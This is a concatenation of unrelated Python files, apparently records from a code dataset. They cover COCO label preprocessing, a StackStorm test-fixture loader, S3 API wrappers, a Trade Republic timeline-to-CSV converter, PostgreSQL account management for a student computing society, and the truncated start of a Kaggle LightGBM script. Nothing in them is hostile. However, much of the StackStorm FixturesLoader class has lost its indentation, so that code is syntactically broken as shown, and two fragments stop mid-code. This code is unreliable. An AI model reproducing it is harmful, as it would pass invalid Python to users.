    LIST = os.path.join(args.save_dir, "train2014imgs.txt")
    wrrite(LIST, train_img_names)
    root_dir = os.path.join(args.dir, "val2014")
    coco, idmapper = load_annotations(args.dir, "val2014")
    labels = load_labels(val_img_names, root_dir, "val", coco, idmapper)
    save_obj(labels, os.path.join(args.save_dir, "multi-label-val2014"))
    LIST = os.path.join(args.save_dir, "val2014imgs.txt")
    wrrite(LIST, val_img_names)
elif args.dataset == 'val':
    root_dir = os.path.join(args.dir, "val2014")
    # BUG FIX: load_annotations takes (dataDir, dataType); it was called
    # with the image directory only, which raised a TypeError.
    coco, idmapper = load_annotations(args.dir, "val2014")
    labels = load_labels(val_img_names, root_dir, "val", coco, idmapper)
    save_obj(labels, os.path.join(args.save_dir, "multi-label-val2014"))
    LIST = os.path.join(args.save_dir, "val2014imgs.txt")
    wrrite(LIST, val_img_names)
elif args.dataset == 'train':
    root_dir = os.path.join(args.dir, "train2014")
    # BUG FIX: same one-argument call as the 'val' branch above.
    coco, idmapper = load_annotations(args.dir, "train2014")
    labels = load_labels(train_img_names, root_dir, "train", coco, idmapper)
    save_obj(labels, os.path.join(args.save_dir, "multi-label-train2014"))
    LIST = os.path.join(args.save_dir, "train2014imgs.txt")
    wrrite(LIST, train_img_names)
# For image segmentaion
# converting polygon and RLE to binary mask
#labels = {}
#for i in range(len(imgsname)):
# print(i)
# if val == True:
# imgIds=int(imgsname[i][19:25])
# else:
# imgIds=int(imgsname[i][21:27])
# annIds = coco.getAnnIds(imgIds=imgIds, iscrowd=None)
# anns = coco.loadAnns(annIds)
# for annot in anns:
# cmask_partial = coco.annToMask(annot)
#
| StarcoderdataPython |
4956576 | <filename>st2tests/st2tests/fixturesloader.py
# Licensed to the StackStorm, Inc ('StackStorm') under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import absolute_import
import copy
import os
import six
from st2common.content.loader import MetaLoader
from st2common.models.api.action import (ActionAPI, LiveActionAPI, ActionExecutionStateAPI,
RunnerTypeAPI, ActionAliasAPI)
from st2common.models.api.auth import ApiKeyAPI, UserAPI
from st2common.models.api.execution import (ActionExecutionAPI)
from st2common.models.api.policy import (PolicyTypeAPI, PolicyAPI)
from st2common.models.api.rule import (RuleAPI)
from st2common.models.api.rule_enforcement import RuleEnforcementAPI
from st2common.models.api.sensor import SensorTypeAPI
from st2common.models.api.trace import TraceAPI
from st2common.models.api.trigger import (TriggerAPI, TriggerTypeAPI, TriggerInstanceAPI)
from st2common.models.db.action import ActionDB
from st2common.models.db.actionalias import ActionAliasDB
from st2common.models.db.auth import ApiKeyDB, UserDB
from st2common.models.db.liveaction import LiveActionDB
from st2common.models.db.executionstate import ActionExecutionStateDB
from st2common.models.db.runner import RunnerTypeDB
from st2common.models.db.execution import (ActionExecutionDB)
from st2common.models.db.policy import (PolicyTypeDB, PolicyDB)
from st2common.models.db.rule import RuleDB
from st2common.models.db.rule_enforcement import RuleEnforcementDB
from st2common.models.db.sensor import SensorTypeDB
from st2common.models.db.trace import TraceDB
from st2common.models.db.trigger import (TriggerDB, TriggerTypeDB, TriggerInstanceDB)
from st2common.persistence.action import Action
from st2common.persistence.actionalias import ActionAlias
from st2common.persistence.execution import ActionExecution
from st2common.persistence.executionstate import ActionExecutionState
from st2common.persistence.auth import ApiKey, User
from st2common.persistence.liveaction import LiveAction
from st2common.persistence.runner import RunnerType
from st2common.persistence.policy import (PolicyType, Policy)
from st2common.persistence.rule import Rule
from st2common.persistence.rule_enforcement import RuleEnforcement
from st2common.persistence.sensor import SensorType
from st2common.persistence.trace import Trace
from st2common.persistence.trigger import (Trigger, TriggerType, TriggerInstance)
# Fixture types that have a corresponding database model and can therefore be
# persisted with FixturesLoader.save_fixtures_to_db() / load_models().
ALLOWED_DB_FIXTURES = ['actions', 'actionstates', 'aliases', 'executions', 'liveactions',
                       'policies', 'policytypes', 'rules', 'runners', 'sensors',
                       'triggertypes', 'triggers', 'triggerinstances', 'traces', 'apikeys',
                       'users', 'enforcements']
# File-only fixture types (loaded as plain dicts, no DB model) on top of the
# DB-backed ones above.
ALLOWED_FIXTURES = copy.copy(ALLOWED_DB_FIXTURES)
ALLOWED_FIXTURES.extend(['actionchains', 'workflows'])
# Fixture type -> DB document class.
FIXTURE_DB_MODEL = {
    'actions': ActionDB,
    'aliases': ActionAliasDB,
    'actionstates': ActionExecutionStateDB,
    'apikeys': ApiKeyDB,
    'enforcements': RuleEnforcementDB,
    'executions': ActionExecutionDB,
    'liveactions': LiveActionDB,
    'policies': PolicyDB,
    'policytypes': PolicyTypeDB,
    'rules': RuleDB,
    'runners': RunnerTypeDB,
    'sensors': SensorTypeDB,
    'traces': TraceDB,
    'triggertypes': TriggerTypeDB,
    'triggers': TriggerDB,
    'triggerinstances': TriggerInstanceDB,
    'users': UserDB
}
# Fixture type -> API (serialization) model class; used to validate fixture
# files and convert them to DB models.
FIXTURE_API_MODEL = {
    'actions': ActionAPI,
    'aliases': ActionAliasAPI,
    'actionstates': ActionExecutionStateAPI,
    'apikeys': ApiKeyAPI,
    'enforcements': RuleEnforcementAPI,
    'executions': ActionExecutionAPI,
    'liveactions': LiveActionAPI,
    'policies': PolicyAPI,
    'policytypes': PolicyTypeAPI,
    'rules': RuleAPI,
    'runners': RunnerTypeAPI,
    'sensors': SensorTypeAPI,
    'traces': TraceAPI,
    'triggertypes': TriggerTypeAPI,
    'triggers': TriggerAPI,
    'triggerinstances': TriggerInstanceAPI,
    'users': UserAPI
}
# Fixture type -> persistence access class (add_or_update / delete wrapper).
FIXTURE_PERSISTENCE_MODEL = {
    'actions': Action,
    'aliases': ActionAlias,
    'actionstates': ActionExecutionState,
    'apikeys': ApiKey,
    'enforcements': RuleEnforcement,
    'executions': ActionExecution,
    'liveactions': LiveAction,
    'policies': Policy,
    'policytypes': PolicyType,
    'rules': Rule,
    'runners': RunnerType,
    'sensors': SensorType,
    'traces': Trace,
    'triggertypes': TriggerType,
    'triggers': Trigger,
    'triggerinstances': TriggerInstance,
    'users': User
}
# Error template ("%s" = submodule path) shown when a fixtures git submodule
# has not been initialized; newlines are collapsed into one line.
GIT_SUBMODULES_NOT_CHECKED_OUT_ERROR = """
Git submodule "%s" is not checked out. Make sure to run "git submodule update --init
--recursive" in the repository root directory to check out all the
submodules.
""".replace('\n', '').strip()
def get_fixtures_base_path():
    """Absolute path of the ``fixtures`` directory shipped next to this module."""
    here = os.path.dirname(__file__)
    return os.path.join(here, 'fixtures')
def get_fixtures_packs_base_path():
    """Absolute path of the bundled ``fixtures/packs`` directory."""
    here = os.path.dirname(__file__)
    return os.path.join(here, 'fixtures/packs')
def get_resources_base_path():
    """Absolute path of the ``resources`` directory shipped next to this module."""
    here = os.path.dirname(__file__)
    return os.path.join(here, 'resources')
class FixturesLoader(object):
def __init__(self):
self.meta_loader = MetaLoader()
def save_fixtures_to_db(self, fixtures_pack='generic', fixtures_dict=None,
use_object_ids=False):
"""
Loads fixtures specified in fixtures_dict into the database
and returns DB models for the fixtures.
fixtures_dict should be of the form:
{
'actions': ['action-1.yaml', 'action-2.yaml'],
'rules': ['rule-1.yaml'],
'liveactions': ['execution-1.yaml']
}
:param fixtures_pack: Name of the pack to load fixtures from.
:type fixtures_pack: ``str``
:param fixtures_dict: Dictionary specifying the fixtures to load for each type.
:type fixtures_dict: ``dict``
:param use_object_ids: Use object id primary key from fixture file (if available) when
storing objects in the database. By default id in
file is discarded / not used and a new random one
is generated.
:type use_object_ids: ``bool``
:rtype: ``dict``
"""
if fixtures_dict is None:
fixtures_dict = {}
fixtures_pack_path = self._validate_fixtures_pack(fixtures_pack)
self._validate_fixture_dict(fixtures_dict, allowed=ALLOWED_DB_FIXTURES)
db_models = {}
for fixture_type, fixtures in six.iteritems(fixtures_dict):
API_MODEL = FIXTURE_API_MODEL.get(fixture_type, None)
PERSISTENCE_MODEL = FIXTURE_PERSISTENCE_MODEL.get(fixture_type, None)
loaded_fixtures = {}
for fixture in fixtures:
# Guard against copy and type and similar typos
if fixture in loaded_fixtures:
msg = 'Fixture "%s" is specified twice, probably a typo.' % (fixture)
raise ValueError(msg)
fixture_dict = self.meta_loader.load(
self._get_fixture_file_path_abs(fixtures_pack_path, fixture_type, fixture))
api_model = API_MODEL(**fixture_dict)
db_model = API_MODEL.to_model(api_model)
# Make sure we also set and use object id if that functionality is used
if use_object_ids and 'id' in fixture_dict:
db_model.id = fixture_dict['id']
db_model = PERSISTENCE_MODEL.add_or_update(db_model)
loaded_fixtures[fixture] = db_model
db_models[fixture_type] = loaded_fixtures
return db_models
def load_fixtures(self, fixtures_pack='generic', fixtures_dict=None):
"""
Loads fixtures specified in fixtures_dict. We
simply want to load the meta into dict objects.
fixtures_dict should be of the form:
{
'actionchains': ['actionchain1.yaml', 'actionchain2.yaml'],
'workflows': ['workflow.yaml']
}
:param fixtures_pack: Name of the pack to load fixtures from.
:type fixtures_pack: ``str``
:param fixtures_dict: Dictionary specifying the fixtures to load for each type.
:type fixtures_dict: ``dict``
:rtype: ``dict``
"""
if not fixtures_dict:
return {}
fixtures_pack_path = self._validate_fixtures_pack(fixtures_pack)
self._validate_fixture_dict(fixtures_dict)
all_fixtures = {}
for fixture_type, fixtures in six.iteritems(fixtures_dict):
loaded_fixtures = {}
for fixture in fixtures:
fixture_dict = self.meta_loader.load(
self._get_fixture_file_path_abs(fixtures_pack_path, fixture_type, fixture))
loaded_fixtures[fixture] = fixture_dict
all_fixtures[fixture_type] = loaded_fixtures
return all_fixtures
def load_models(self, fixtures_pack='generic', fixtures_dict=None):
"""
Loads fixtures specified in fixtures_dict as db models. This method must be
used for fixtures that have associated DB models. We simply want to load the
meta as DB models but don't want to save them to db.
fixtures_dict should be of the form:
{
'actions': ['action-1.yaml', 'action-2.yaml'],
'rules': ['rule-1.yaml'],
'liveactions': ['execution-1.yaml']
}
:param fixtures_pack: Name of the pack to load fixtures from.
:type fixtures_pack: ``str``
:param fixtures_dict: Dictionary specifying the fixtures to load for each type.
:type fixtures_dict: ``dict``
:rtype: ``dict``
"""
if not fixtures_dict:
return {}
fixtures_pack_path = self._validate_fixtures_pack(fixtures_pack)
self._validate_fixture_dict(fixtures_dict, allowed=ALLOWED_DB_FIXTURES)
all_fixtures = {}
for fixture_type, fixtures in six.iteritems(fixtures_dict):
API_MODEL = FIXTURE_API_MODEL.get(fixture_type, None)
loaded_models = {}
for fixture in fixtures:
fixture_dict = self.meta_loader.load(
self._get_fixture_file_path_abs(fixtures_pack_path, fixture_type, fixture))
api_model = API_MODEL(**fixture_dict)
db_model = API_MODEL.to_model(api_model)
loaded_models[fixture] = db_model
all_fixtures[fixture_type] = loaded_models
return all_fixtures
def delete_fixtures_from_db(self, fixtures_pack='generic', fixtures_dict=None,
raise_on_fail=False):
"""
Deletes fixtures specified in fixtures_dict from the database.
fixtures_dict should be of the form:
{
'actions': ['action-1.yaml', 'action-2.yaml'],
'rules': ['rule-1.yaml'],
'liveactions': ['execution-1.yaml']
}
:param fixtures_pack: Name of the pack to delete fixtures from.
:type fixtures_pack: ``str``
:param fixtures_dict: Dictionary specifying the fixtures to delete for each type.
:type fixtures_dict: ``dict``
:param raise_on_fail: Optional If True, raises exception if delete fails on any fixture.
:type raise_on_fail: ``boolean``
"""
if not fixtures_dict:
return
fixtures_pack_path = self._validate_fixtures_pack(fixtures_pack)
self._validate_fixture_dict(fixtures_dict)
for fixture_type, fixtures in six.iteritems(fixtures_dict):
API_MODEL = FIXTURE_API_MODEL.get(fixture_type, None)
PERSISTENCE_MODEL = FIXTURE_PERSISTENCE_MODEL.get(fixture_type, None)
for fixture in fixtures:
fixture_dict = self.meta_loader.load(
self._get_fixture_file_path_abs(fixtures_pack_path, fixture_type, fixture))
# Note that when we have a reference mechanism consistent for
# every model, we can just do a get and delete the object. Until
# then, this model conversions are necessary.
api_model = API_MODEL(**fixture_dict)
db_model = API_MODEL.to_model(api_model)
try:
PERSISTENCE_MODEL.delete(db_model)
except:
if raise_on_fail:
raise
def delete_models_from_db(self, models_dict, raise_on_fail=False):
    """
    Deletes models specified in models_dict from the database.

    models_dict should be of the form:
    {
        'actions': [ACTION1, ACTION2],
        'rules': [RULE1],
        'liveactions': [EXECUTION]
    }

    :param models_dict: Dictionary specifying the models to delete for each type.
    :type models_dict: ``dict``.
    :param raise_on_fail: Optional If True, raises exception if delete fails on any model.
    :type raise_on_fail: ``boolean``
    """
    for model_type, models in six.iteritems(models_dict):
        PERSISTENCE_MODEL = FIXTURE_PERSISTENCE_MODEL.get(model_type, None)
        for model in models:
            try:
                PERSISTENCE_MODEL.delete(model)
            except Exception:
                # Narrowed from a bare ``except:`` so KeyboardInterrupt and
                # SystemExit are no longer silently swallowed.
                if raise_on_fail:
                    raise
def _validate_fixtures_pack(self, fixtures_pack):
    """Resolve a fixtures pack name to a path, raising when the pack is absent."""
    pack_path = self._get_fixtures_pack_path(fixtures_pack)
    if self._is_fixture_pack_exists(pack_path):
        return pack_path
    raise Exception('Fixtures pack not found ' +
                    'in fixtures path %s.' % get_fixtures_base_path())
def _validate_fixture_dict(self, fixtures_dict, allowed=ALLOWED_FIXTURES):
    """Raise when fixtures_dict contains a fixture type outside *allowed*."""
    for fixture_type in list(fixtures_dict.keys()):
        if fixture_type in allowed:
            continue
        raise Exception('Disallowed fixture type: %s' % fixture_type)
def _is_fixture_pack_exists(self, fixtures_pack_path):
    """Return True when the fixtures pack path exists on disk."""
    exists = os.path.exists(fixtures_pack_path)
    return exists
def _get_fixture_file_path_abs(self, fixtures_pack_path, fixtures_type, fixture_name):
    """Path of a fixture file inside an already-resolved pack path."""
    parts = (fixtures_pack_path, fixtures_type, fixture_name)
    return os.path.join(*parts)
def _get_fixtures_pack_path(self, fixtures_pack_name):
    """Path of the named fixtures pack under the fixtures base path."""
    base_path = get_fixtures_base_path()
    return os.path.join(base_path, fixtures_pack_name)
def get_fixture_file_path_abs(self, fixtures_pack, fixtures_type, fixture_name):
    """Absolute path of a fixture file addressed by pack/type/name."""
    base_path = get_fixtures_base_path()
    return os.path.join(base_path, fixtures_pack, fixtures_type, fixture_name)
def assert_submodules_are_checked_out():
    """
    Verify that "git submodule update --init --recursive" has been run in the
    repo root, i.e. that the "st2tests/st2tests/fixtures/packs/test" git
    submodule used by the tests is present on disk.
    """
    pack_path = os.path.abspath(
        os.path.join(get_fixtures_packs_base_path(), 'test_content_version/'))
    marker_path = os.path.join(pack_path, '.git')
    # NOTE: In newer versions of git, that .git is a file and not a directory
    if not os.path.exists(marker_path):
        raise ValueError(GIT_SUBMODULES_NOT_CHECKED_OUT_ERROR % (pack_path))
    return True
| StarcoderdataPython |
8018654 | <gh_stars>1-10
from pathlib import PosixPath
import botocore
from ..util.log import Log, log_call
from .client import with_client
_log = Log('s3.api')
@with_client
@log_call('s3.api', 'Making api call `{func}` {kwargs}')
def ls(client, bucket = None):
    """Yield listing pages: the caller's buckets, or objects in *bucket*."""
    if bucket is None:
        _log.debug("Bucket not provided, listing user's buckets")
        yield client.list_buckets()
        return
    _log.debug('Bucket provided, listing objects in s3://%s'%bucket)
    marker = None
    truncated = True
    while truncated:
        if marker:
            _log.debug('Fetching next page for %s'%bucket)
            page = client.list_objects(Bucket=bucket, Marker=marker)
        else:
            page = client.list_objects(Bucket=bucket)
        yield page
        truncated = page.get('IsTruncated', False)
        marker = page.get('NextMarker', None)
        # list_objects only returns NextMarker when Delimiter is used;
        # otherwise continue from the last key of the page.
        if truncated and marker is None:
            marker = page['Contents'][-1]['Key']
@with_client
@log_call('s3.api', 'Making api call `{func}` {kwargs}')
def lv(client, bucket = None, key = None):
    """Yield pages of object versions under *key* (or the whole bucket)."""
    if key is None:
        prefix = ''
        _log.debug('No prefix provided, defaulting to empty string')
    else:
        prefix = key
        _log.debug('Using prefix `%s`'%prefix)
    key_marker = None
    version_marker = None
    truncated = True
    while truncated:
        # Both markers must be present to request a continuation page.
        if key_marker is not None and version_marker is not None:
            _log.debug('Fetching next page for %s'%bucket)
            page = client.list_object_versions(
                Bucket=bucket,
                Prefix=prefix,
                KeyMarker=key_marker,
                VersionIdMarker=version_marker
            )
        else:
            page = client.list_object_versions(
                Bucket=bucket,
                Prefix=prefix
            )
        yield page
        truncated = page.get('IsTruncated', False)
        key_marker = page.get('NextKeyMarker', None)
        version_marker = page.get('NextVersionIdMarker', None)
@with_client
@log_call('s3.api', 'Making api call `{func}` {kwargs}')
def head(client, bucket = None, key = None, version_id = None):
    """HEAD an object, optionally pinned to a specific version."""
    if version_id is not None:
        _log.debug('Got VersionId HEADing %s ver: %s'%(key, version_id))
        return client.head_object(Bucket=bucket, Key=key, VersionId=version_id)
    _log.debug('No VersionId provided, HEADing %s'%key)
    return client.head_object(Bucket=bucket, Key=key)
@with_client
@log_call('s3.api', 'Making api call `{func}` {kwargs}')
def get(client, bucket = None, key = None, version_id = None):
    """GET an object, optionally pinned to a specific version.

    Fix: the ``kwargs`` dict was previously built but never used; it now
    carries the optional ``VersionId`` into the single ``get_object`` call.
    """
    kwargs = dict(Bucket=bucket, Key=key)
    if version_id is None:
        _log.debug('No VersionId provided, GET s3://%s/%s'%(bucket, key))
    else:
        _log.debug('Got VersionId provided, GET s3://%s/%s ver: %s'%(bucket, key, version_id))
        kwargs['VersionId'] = version_id
    return client.get_object(**kwargs)
@with_client
def put(client, bucket = None, key = None):
    """Upload an object. Placeholder only — not implemented yet."""
    # TODO: implement via client.put_object
    pass
@with_client
def cp(client, target_bucket = None, target_key = None, bucket = None, key = None):
    """Copy an object between buckets/keys. Placeholder only — not implemented yet."""
    # TODO: implement via client.copy_object
    pass
@with_client
@log_call('s3.api', 'Making api call `{func}` {kwargs}')
def get_bucket_replication(client, bucket = None):
    """Return the bucket's replication configuration, or None when the call fails."""
    try:
        _log.debug('Getting ReplicationConfig for %s'%bucket)
        return client.get_bucket_replication(Bucket=bucket)
    except botocore.exceptions.ClientError:
        # Best-effort: e.g. no replication configured on the bucket.
        return None
| StarcoderdataPython |
3352981 | import json
import re
from datetime import datetime
# Read my timeline (Trade Republic timeline event export).
with open('myTimeline.json', 'r', encoding='utf-8') as f:
    timeline = json.loads(f.read())
# Read stock JSON data (Lang & Schwarz ISIN list).
with open('../LS/isins.json', 'r', encoding='utf-8') as f:
    lsIsins = json.loads(f.read())
# All stocks crawled from TR
with open('allStocks.json', 'r', encoding='utf-8') as f:
    allStocks = json.loads(f.read())
# Build company-name -> ISIN lookup from the crawled stock list.
companyNames = {}
for stock in allStocks:
    companyNames[stock["company"]["name"]] = stock["isin"]
# Fixed ISINs: manual name -> ISIN overrides for names the crawl misses.
with open('companyNameIsins.json', 'r', encoding='utf-8') as f:
    fixedIsins = json.loads(f.read())
# Extract decimal number in a string
def getDecimalFromString(inputString):
    """Extract the first German-formatted decimal (e.g. '1.234,56') from
    *inputString* and return it in dot-decimal form ('1234.56').

    Returns None when the string contains no number (or is not a string).

    Fixes: narrowed the bare ``except:``, removed the unreachable trailing
    ``return None``, and made the regex a raw string.
    """
    try:
        numbers = re.findall(r'[-+]?\d.*\,\d+|\d+', inputString)
        return numbers[0].replace(".", "").replace(",", ".")
    except (IndexError, TypeError):
        # IndexError: no match found; TypeError: inputString not a string.
        return None
# Unify a company name to compare
# Trade Republic uses different company names. This makes it very hard to map the timeline events to companies.
# @TradeRepublic: Please add ISIN in timeline event JSON
def unifyCompanyName(inputString):
    """Normalise a company name for fuzzy comparison: keep only
    alphanumeric characters and lowercase the result."""
    kept_chars = [ch for ch in inputString if ch.isalnum()]
    return ''.join(kept_chars).lower()
# Return ISIN from company name. Uses the JSON object from isins.json
# Returns None, if no ISIN found
def getIsinFromStockName(stockName):
    """Resolve a Trade Republic company name to an ISIN.

    Lookup order: crawled TR names, then the manual fixup table, then a
    fuzzy substring match against the LS ISIN list. Returns '' when
    nothing matches.

    Fixes: narrowed the nested bare ``except:`` clauses and removed the
    unused ``name`` local.
    """
    try:
        return companyNames[stockName]
    except KeyError:
        pass
    try:
        # Try to get the ISIN from the fixed list
        return fixedIsins[stockName]
    except KeyError:
        pass
    # Fall back to fuzzy matching against the LS list entries [_, isin, name].
    stockNameUnify = unifyCompanyName(stockName)
    for stock in lsIsins:
        try:
            isin = stock[1]
            nameUnify = unifyCompanyName(stock[2])
        except (IndexError, KeyError, TypeError):
            # Malformed entry — skip it.
            continue
        if stockNameUnify in nameUnify:
            return isin
    return ""
# Portfolio Performance transaction types:
# Kauf, Einlage, Verkauf, Zinsen, Gebühren, Dividende, Umbuchung (Eingang), Umbuchung (Ausgang)
missingIsins = {}
# Write transactions.csv file with one row per timeline event:
# date, transaction, shares, amount, total, fee, isin, name
with open('myTransactions.csv', 'w') as f:
    f.write("Datum;Typ;Stück;amount;Wert;Gebühren;ISIN;name\n")
    for event in timeline:
        event = event["data"]
        # Timestamps are in milliseconds since the epoch.
        dateTime = datetime.fromtimestamp(int(event["timestamp"]/1000))
        date = dateTime.strftime("%Y-%m-%d")
        title = event["title"]
        try:
            body = event["body"]
        except:
            body = ""
        # Skip cancelled ("storniert") events entirely.
        if "storniert" in body:
            continue
        # Cash in
        if title == "Einzahlung":
            f.write('{0};{1};{2};{3};{4};{5};{6};{7}\n'.format(date, "Einlage", "", "", event["cashChangeAmount"], "", "", ""))
        elif title == "Auszahlung":
            f.write('{0};{1};{2};{3};{4};{5};{6};{7}\n'.format(date, "Entnahme", "", "", abs(event["cashChangeAmount"]), "", "", ""))
        # Dividend - Shares
        elif title == "Reinvestierung":
            # TODO: Implement reinvestment
            print("Detected reivestment, skipping... (not implemented yet)")
        # Dividend - Cash
        elif "Gutschrift Dividende" in body:
            isin = getIsinFromStockName(title)
            amountPerShare = getDecimalFromString(body)
            f.write('{0};{1};{2};{3};{4};{5};{6};{7}\n'.format(date, "Dividende", "", amountPerShare, event["cashChangeAmount"], "", isin, title))
            if isin == "" and title not in missingIsins.keys():
                missingIsins[title] = ""
                print('WARNING: Company not found ({0}), missing ISIN'.format(title))
        # Savings plan execution or normal buy
        elif body.startswith("Sparplan ausgeführt") or body.startswith("Kauf") or body.startswith("Limit Kauf zu"):
            # Manual buys carry a 1 EUR order fee; savings-plan executions are free.
            fee = 0
            if body.startswith("Kauf") or body.startswith("Limit Kauf zu"):
                fee = 1.0
            isin = getIsinFromStockName(title)
            amountPerShare = abs(float(getDecimalFromString(body)))
            cashChangeAmount = abs(event["cashChangeAmount"])
            # Shares bought = (total paid - fee) / price per share.
            shares = '{0:.4f}'.format((cashChangeAmount-fee)/amountPerShare)
            f.write('{0};{1};{2};{3};{4};{5};{6};{7}\n'.format(date, "Kauf", shares, amountPerShare, cashChangeAmount, fee, isin, title))
            if isin == "" and title not in missingIsins.keys():
                missingIsins[title] = ""
                print('WARNING: Company not found ({0}), missing ISIN'.format(title))
        # Sell
        elif body.startswith("Verkauf") or body.startswith("Limit Verkauf zu"):
            isin = getIsinFromStockName(title)
            amountPerShare = abs(float(getDecimalFromString(body)))
            cashChangeAmount = abs(event["cashChangeAmount"])
            shares = '{0:.4f}'.format(cashChangeAmount/amountPerShare)
            f.write('{0};{1};{2};{3};{4};{5};{6};{7}\n'.format(date, "Verkauf", shares, amountPerShare, cashChangeAmount, "1.0", isin, title))
            if isin == "" and title not in missingIsins.keys():
                missingIsins[title] = ""
                print('WARNING: Company not found ({0}), missing ISIN'.format(title))
# Report unresolved company names so the fixup table can be extended.
if len(missingIsins.keys()) > 0:
    print("--- MISSING ISINs ---")
    print(json.dumps(missingIsins, indent="\t", sort_keys=True))
    print("Add ISINs to companyNameIsins.json and start again\n")
print("Finished!") | StarcoderdataPython |
4911556 | <reponame>bcherry/bcherry
def deposit(amt):
f = open('data')
bal = int(f.readline())
f.close()
f = open('data','w')
| StarcoderdataPython |
6461676 | """
PostgreSQL accounts and databases for members and societies.
"""
from functools import wraps
from typing import Optional, List, Set, Tuple, Union
from psycopg2.extensions import connection as Connection, cursor as Cursor
from srcf.database import Member, Society
from srcf.database.queries import get_member, get_society
from ..email import send
from ..plumbing import pgsql
from ..plumbing.common import Collect, Owner, State, owner_name, Password, Result, Unset
def connect(db: Optional[str] = None) -> Connection:
    """
    Connect to the PostgreSQL server using ident authentication.
    """
    database = db if db else "sysadmins"
    return pgsql.connect("postgres.internal", database)
@wraps(pgsql.context)
def context(db: Optional[str] = None):
    """
    Run multiple PostgreSQL commands in a single connection:

        with context() as cursor:
            create_account(cursor, owner)
            create_database(cursor, owner)
    """
    conn = connect(db)
    return pgsql.context(conn)
def get_owned_databases(cursor: Cursor, owner: Owner) -> List[str]:
    """
    Find all PostgreSQL databases belonging to a given owner.
    """
    try:
        role = pgsql.get_role(cursor, owner_name(owner))
    except KeyError:
        # No role means the owner cannot own any databases.
        return []
    return pgsql.get_role_databases(cursor, role)
@Result.collect_value
def new_account(cursor: Cursor, owner: Owner) -> Collect[Optional[Password]]:
    """
    Create a PostgreSQL user account for a given member or society.

    For members, grants are added to all society roles for which they are a member.

    Returns the password from ``pgsql.ensure_user`` (presumably None when the
    account already existed — confirm against the plumbing layer).
    """
    username = owner_name(owner)
    res_passwd = yield from pgsql.ensure_user(cursor, username)
    # Keep role grants in sync with the owner's memberships/admins.
    if isinstance(owner, Member):
        yield sync_member_roles(cursor, owner)
    elif isinstance(owner, Society):
        yield sync_society_roles(cursor, owner)
    return res_passwd.value
def _sync_roles(cursor: Cursor, current: Set[Tuple[str, pgsql.Role]],
                needed: Set[Tuple[str, pgsql.Role]]):
    """Yield grant/revoke results that turn *current* into *needed*."""
    to_grant = needed - current
    to_revoke = current - needed
    for username, role in to_grant:
        yield pgsql.grant_role(cursor, username, role)
    for username, role in to_revoke:
        yield pgsql.revoke_role(cursor, username, role)
@Result.collect
def sync_member_roles(cursor: Cursor, member: Member) -> Collect[None]:
    """
    Adjust grants for society roles to match the given member's memberships.
    """
    if not member.societies:
        return
    username = owner_name(member)
    # Existing grants of this member that point at society accounts.
    current: Set[Tuple[str, pgsql.Role]] = set()
    for role in pgsql.get_user_roles(cursor, username):
        # Filter active roles to those owned by society accounts.
        if role[0] == member.crsid:
            # Skip the member's own role.
            continue
        try:
            get_society(role[0])
        except KeyError:
            # Not a society role — leave it alone.
            continue
        else:
            current.add((username, role))
    # The member should hold exactly the roles of the societies they belong to.
    roles = pgsql.get_roles(cursor, *(soc.society for soc in member.societies))
    needed = set((username, role) for role in roles)
    yield from _sync_roles(cursor, current, needed)
@Result.collect
def sync_society_roles(cursor: Cursor, society: Society) -> Collect[None]:
    """
    Adjust grants for member roles to match the given society's admins.
    """
    try:
        role = pgsql.get_role(cursor, owner_name(society))
    except KeyError:
        # The society has no PostgreSQL role yet, so there is nothing to sync.
        return
    # Users currently granted the society role that are member accounts.
    current: Set[Tuple[str, pgsql.Role]] = set()
    for username in pgsql.get_role_users(cursor, role):
        # Filter active roles to those owned by member accounts.
        try:
            get_member(username)
        except KeyError:
            # Not a member account — leave it alone.
            continue
        else:
            current.add((username, role))
    # Every current admin of the society should hold the society role.
    needed = set((user[0], role) for user in pgsql.get_roles(cursor, *society.admin_crsids))
    yield from _sync_roles(cursor, current, needed)
@Result.collect_value
def reset_password(cursor: Cursor, owner: Owner) -> Collect[Password]:
    """
    Reset the password of a member's or society's PostgreSQL user account
    and mail the new password to the owner.
    """
    username = owner_name(owner)
    res_passwd = yield from pgsql.reset_password(cursor, username)
    yield send(owner, "tasks/pgsql_password.j2",
               {"username": username, "password": res_passwd.value})
    return res_passwd.value
def drop_account(cursor: Cursor, owner: Owner) -> Result[Unset]:
    """
    Drop a PostgreSQL user account for a given member or society.
    """
    username = owner_name(owner)
    return pgsql.drop_user(cursor, username)
@Result.collect_value
def create_database(cursor: Cursor, owner: Owner, name: Optional[str] = None) -> Collect[str]:
    """
    Create a new PostgreSQL database for the owner, defaulting to one matching their username.
    """
    role = pgsql.get_role(cursor, owner_name(owner))
    # role[0] is the role name; use it when no explicit database name is given.
    db_name = name if name else role[0]
    yield pgsql.create_database(cursor, db_name, role)
    return db_name
@Result.collect_value
def drop_database(cursor: Cursor, target: Union[Owner, str]) -> Collect[str]:
    """
    Drop the named, or owner-named, PostgreSQL database.
    """
    if isinstance(target, str):
        name = target
    else:
        name = owner_name(target)
    yield pgsql.drop_database(cursor, name)
    return name
@Result.collect
def drop_all_databases(cursor: Cursor, owner: Owner) -> Collect[None]:
    """
    Drop all databases belonging to the owner.
    """
    owned = get_owned_databases(cursor, owner)
    for database in owned:
        yield pgsql.drop_database(cursor, database)
@Result.collect_value
def create_account(cursor: Cursor, owner: Owner) -> Collect[Tuple[Optional[Password], str]]:
    """
    Create a PostgreSQL user account and initial database for a member or society.
    """
    res_account = yield from new_account(cursor, owner)
    res_db = yield from create_database(cursor, owner)
    # Only send the welcome mail when the account was freshly created.
    if res_account.state == State.created:
        details = {
            "username": owner_name(owner),
            "password": res_account.value,
            "database": res_db.value,
        }
        yield send(owner, "tasks/pgsql_create.j2", details)
    return (res_account.value, res_db.value)
| StarcoderdataPython |
11372494 | #https://www.kaggle.com/kyakovlev/ieee-simple-lgbm
# General imports
import numpy as np
import pandas as pd
import os, sys, gc, warnings, random, datetime
import time
import pickle
from sklearn import metrics
from sklearn.model_selection import train_test_split, KFold
from sklearn.preprocessing import LabelEncoder
from litemort import *
from tqdm import tqdm
import math
warnings.filterwarnings('ignore')
# Backend selection: "mort" on the command line selects LiteMORT, else LightGBM.
